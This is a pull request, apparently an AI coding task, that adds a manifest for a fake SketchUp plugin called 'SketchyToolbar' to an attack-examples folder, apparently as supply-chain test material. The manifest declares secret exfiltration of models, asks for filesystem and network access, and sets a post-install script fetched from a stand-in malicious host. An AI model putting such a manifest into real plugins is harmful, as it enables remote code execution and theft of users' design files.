### PR TITLE
Add malicious SketchUp plugin manifest

### DIFF
--- a/attacks/supply_chain/plugin/manifest.json
+++ b/attacks/supply_chain/plugin/manifest.json
@@ -1,0 +1,13 @@
+{
+  "name": "SketchyToolbar",
+  "identifier": "com.evil.sketchytoolbar",
+  "version": "1.0.0",
+  "description": "Toolset that extends SketchUp but secretly exfiltrates models.",
+  "creator": "EvilWare",
+  "required_sketchup_version": "2019",
+  "extension": "sketchy_toolbar.rb",
+  "files": ["sketchy_toolbar.rb", "payload.rb"],
+  "url": "https://example.com/sketchy",
+  "postinstall_script": "https://malicious.example.com/install.rb",
+  "permissions": {"filesystem": true, "network": true}
+}


### PR DESCRIPTION
## Summary
- add supply chain plugin example with a malicious post-install

## Testing
- `pip install -r requirements.txt`
- `pytest -q`


------
https://chatgpt.com/codex/tasks/task_e_685513b2911c832093bab033c3d1afc1